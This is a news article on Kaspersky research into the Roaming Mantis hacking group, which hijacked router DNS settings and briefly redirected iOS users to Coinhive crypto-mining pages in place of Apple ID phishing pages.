New Kaspersky research indicates that the increasingly popular Roaming Mantis Group is testing a new monetization technique that involves the redirection of iOS users to Coinhive in-browser mining pages. Prior activities of this hacking group included the exploitation of vulnerable routers and changing their DNS configuration.
This would allow attackers to redirect router traffic to malicious Android applications masqueraded as Facebook or Chrome, or in the case of Apple devices – to phishing pages deployed to harvest Apple ID credentials.
The Roaming Mantis Group with New Hacking Approaches
In its newest campaigns, the attackers seem to be redirecting iOS users to pages that are laden with the Coinhive in-browser mining script, instead of redirecting them to the regular Apple phishing page. Once redirected, users are shown a blank page, with their CPU jumping up to 90% or even higher.
“During our research, it became clear that Roaming Mantis has been rather active and has evolved quickly,” Kaspersky researchers said. Apparently, malware produced by the Roaming Mantis Group now supports 27 languages, including multiple countries from Asia and beyond, Europe and the Middle East. The latest updates in terms of malicious activities include web crypto-mining for PC, and Apple phishing pages for iOS devices.
We have confirmed several new activities and changes to their illegal profit-gaining methods such as web crypto mining for iOS devices, spreading via malicious content delivery system and so on, Kaspersky added.
The hacking group previously targeted iOS devices via an Apple phishing page designed to harvest credentials. However, now the HTML source code of the malicious landing page appears to have been changed.
Apparently, the hackers disabled redirection to the fake Apple portal (with a phishing page) and added code with a web mining script (previously used only for computers) to run mining on iOS devices, the researchers explained.
Interestingly, the day after Kaspersky confirmed their findings, the hackers switched back to Apple phishing again. “We believe that the criminals, at that time, were testing the possible revenue from web mining on iOS devices, looking for an efficient way to monetize their activities“, Kaspersky concluded.